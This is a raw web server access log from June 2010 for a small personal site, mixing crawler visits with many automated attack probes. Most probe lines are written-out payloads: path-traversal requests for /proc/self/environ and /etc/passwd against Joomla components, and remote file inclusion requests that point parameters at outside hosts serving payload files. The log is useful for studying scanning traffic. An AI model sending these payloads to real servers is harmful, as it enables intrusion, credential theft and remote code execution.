207.46.204.231 - - [06/Jun/2010:19:02:36 -0500] "GET /logs/access_log.1160092800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.12.123 - - [06/Jun/2010:19:04:02 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 200 612778 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
207.46.204.187 - - [06/Jun/2010:19:10:36 -0500] "GET /logs/access_log.1211760000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.145 - - [06/Jun/2010:19:15:42 -0500] "GET /tattoo/set1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.193 - - [06/Jun/2010:19:20:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.33.194 - - [06/Jun/2010:19:24:48 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.175.33.194 - - [06/Jun/2010:19:24:48 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.175.33.194 - - [06/Jun/2010:19:24:48 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
66.235.124.132 - - [06/Jun/2010:19:29:49 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [06/Jun/2010:19:29:49 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
67.225.141.62 - - [06/Jun/2010:19:30:08 -0500] "GET /logs/access_log.1273622400/saveserver.php?thisdir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:19:30:09 -0500] "GET /saveserver.php?thisdir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:19:30:09 -0500] "GET /logs/saveserver.php?thisdir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:19:30:58 -0500] "GET /logs/access_log.1232668800/saveserver.php?thisdir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.831"
121.190.102.21 - - [06/Jun/2010:19:31:22 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:19:31:26 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:19:31:26 -0500] "GET /logs/access_log.1270771200/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.249.65.145 - - [06/Jun/2010:19:34:21 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.52 - - [06/Jun/2010:19:38:36 -0500] "GET /logs/access_log.1186272000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [06/Jun/2010:19:41:47 -0500] "GET /logs/access_log.1263686400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.130.32.50 - - [06/Jun/2010:19:45:05 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.130.32.50 - - [06/Jun/2010:19:45:06 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.12.211 - - [06/Jun/2010:19:50:29 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)"
206.210.68.43 - - [06/Jun/2010:19:55:16 -0500] "GET //*.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
195.64.165.104 - - [06/Jun/2010:19:58:08 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.805"
195.64.165.104 - - [06/Jun/2010:19:58:08 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
195.64.165.104 - - [06/Jun/2010:20:01:06 -0500] "GET /logs//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.805"
195.64.165.104 - - [06/Jun/2010:20:01:06 -0500] "GET //components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.805"
217.16.18.219 - - [06/Jun/2010:20:02:54 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.16.18.219 - - [06/Jun/2010:20:02:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.805"
216.14.126.220 - - [06/Jun/2010:20:05:15 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:20:05:15 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.106.166.59 - - [06/Jun/2010:20:05:16 -0500] "GET /index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.14.126.220 - - [06/Jun/2010:20:05:19 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:20:05:19 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
87.106.166.59 - - [06/Jun/2010:20:05:23 -0500] "GET /index.html?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.73.147.76 - - [06/Jun/2010:20:05:33 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:05:33 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:05:34 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:05:34 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:05:35 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:05:35 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.106.166.59 - - [06/Jun/2010:20:05:47 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.64.165.104 - - [06/Jun/2010:20:05:48 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
195.64.165.104 - - [06/Jun/2010:20:05:48 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
69.73.147.76 - - [06/Jun/2010:20:05:51 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.14.126.220 - - [06/Jun/2010:20:05:52 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
87.106.166.59 - - [06/Jun/2010:20:06:23 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
69.73.147.76 - - [06/Jun/2010:20:06:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:06:38 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:06:38 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.14.126.220 - - [06/Jun/2010:20:06:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:20:06:59 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:20:06:59 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.227.220.35 - - [06/Jun/2010:20:07:07 -0500] "GET /index.html?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.220.35 - - [06/Jun/2010:20:07:07 -0500] "GET /index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.220.35 - - [06/Jun/2010:20:07:21 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.227.220.35 - - [06/Jun/2010:20:07:46 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.53.154.162 - - [06/Jun/2010:20:10:52 -0500] "GET /logs//?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.831"
74.53.154.162 - - [06/Jun/2010:20:10:53 -0500] "GET //?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
206.188.209.35 - - [06/Jun/2010:20:12:18 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.200.76.150 - - [06/Jun/2010:20:12:18 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
206.188.209.35 - - [06/Jun/2010:20:12:18 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.200.76.150 - - [06/Jun/2010:20:12:18 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.188.209.35 - - [06/Jun/2010:20:15:22 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.188.209.35 - - [06/Jun/2010:20:15:22 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.200.76.150 - - [06/Jun/2010:20:15:35 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.200.76.150 - - [06/Jun/2010:20:15:35 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:19:02 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:19:03 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:19:55 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
121.190.102.21 - - [06/Jun/2010:20:20:39 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
69.73.147.76 - - [06/Jun/2010:20:20:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:20:50 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:20:20:50 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
121.190.102.21 - - [06/Jun/2010:20:21:00 -0500] "GET /logs/access_log.1271548800///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:21:00 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:21:42 -0500] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:21:42 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:21:42 -0500] "GET ///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:08 -0500] "GET ///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:08 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:08 -0500] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:18 -0500] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:18 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:18 -0500] "GET ///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET ///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET ///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
62.128.135.52 - - [06/Jun/2010:20:22:25 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:25:18 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:25:18 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:25:19 -0500] "GET /logs/access_log.1271548800/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
67.195.112.180 - - [06/Jun/2010:20:25:23 -0500] "GET /logs/access_log.1210204800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.134 - - [06/Jun/2010:20:30:06 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.188.209.35 - - [06/Jun/2010:20:31:32 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.188.209.35 - - [06/Jun/2010:20:31:32 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.200.76.150 - - [06/Jun/2010:20:31:47 -0500] "GET /logs/index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.200.76.150 - - [06/Jun/2010:20:31:47 -0500] "GET /index2.php?option=com_spsnewsletter=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
119.63.193.56 - - [06/Jun/2010:20:35:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
207.46.199.184 - - [06/Jun/2010:20:36:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.234.238.90 - - [06/Jun/2010:20:43:31 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:32 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:32 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:32 -0500] "GET /logs/access_log.1270944000//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:32 -0500] "GET /logs/access_log.1270944000//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:33 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:49 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:49 -0500] "GET /logs/access_log.1270944000//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:43:49 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:44:18 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:44:18 -0500] "GET /logs/access_log.1270944000//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.238.90 - - [06/Jun/2010:20:44:19 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
67.195.112.180 - - [06/Jun/2010:20:46:43 -0500] "GET /logs/access_log.1263600000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [06/Jun/2010:20:47:46 -0500] "GET /logs/access_log.1271548800///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:47:46 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:47:46 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
123.243.67.208 - - [06/Jun/2010:20:48:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
123.243.67.208 - - [06/Jun/2010:20:48:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
123.243.67.208 - - [06/Jun/2010:20:51:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.190.102.21 - - [06/Jun/2010:20:52:22 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:52:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:20:52:23 -0500] "GET /logs/access_log.1274832000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
123.243.67.208 - - [06/Jun/2010:20:55:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.53.154.162 - - [06/Jun/2010:20:56:58 -0500] "GET /logs//?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.831"
74.53.154.162 - - [06/Jun/2010:20:56:59 -0500] "GET //?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [06/Jun/2010:20:57:04 -0500] "GET /logs//?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.831"
